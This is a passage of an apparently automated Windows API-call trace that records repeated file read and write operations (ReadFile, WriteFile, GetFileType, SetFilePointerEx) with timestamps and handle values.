lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.483] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.483] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.484] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.484] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.484] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.484] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] GetFileType (hFile=0x50) returned 0x1 [0209.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.485] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.485] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.485] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.485] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf0c4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf114*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf114*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf164*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf164*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf1b4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf1b4*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] GetFileType (hFile=0x50) returned 0x1 [0209.486] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.486] WriteFile (in: hFile=0x50, lpBuffer=0x2cf204*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf204*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] GetFileType (hFile=0x50) returned 0x1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] WriteFile (in: hFile=0x50, lpBuffer=0x2cf254*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf254*, lpNumberOfBytesWritten=0x2ce2a8*=0x50, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] GetFileType (hFile=0x50) returned 0x1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] WriteFile (in: hFile=0x50, lpBuffer=0x2cf2a4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ce2a8, lpOverlapped=0x0 | out: lpBuffer=0x2cf2a4*, lpNumberOfBytesWritten=0x2ce2a8*=0x20, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.487] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ce294 | out: lpNewFilePointer=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=4) returned 0x58 [0209.487] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.487] _get_osfhandle (_FileHandle=1) returned 0x50 [0209.487] GetFileType (hFile=0x50) returned 0x1 [0209.487] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.488] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.489] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.490] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.491] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.492] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.493] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.494] ReadFile (in: hFile=0x58, lpBuffer=0x2cf0c4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ce2b4, lpOverlapped=0x0 | out: lpBuffer=0x2cf0c4*, lpNumberOfBytesRead=0x2ce2b4*=0x200, lpOverlapped=0x0) returned 1 [0209.495] ReadFile (in: 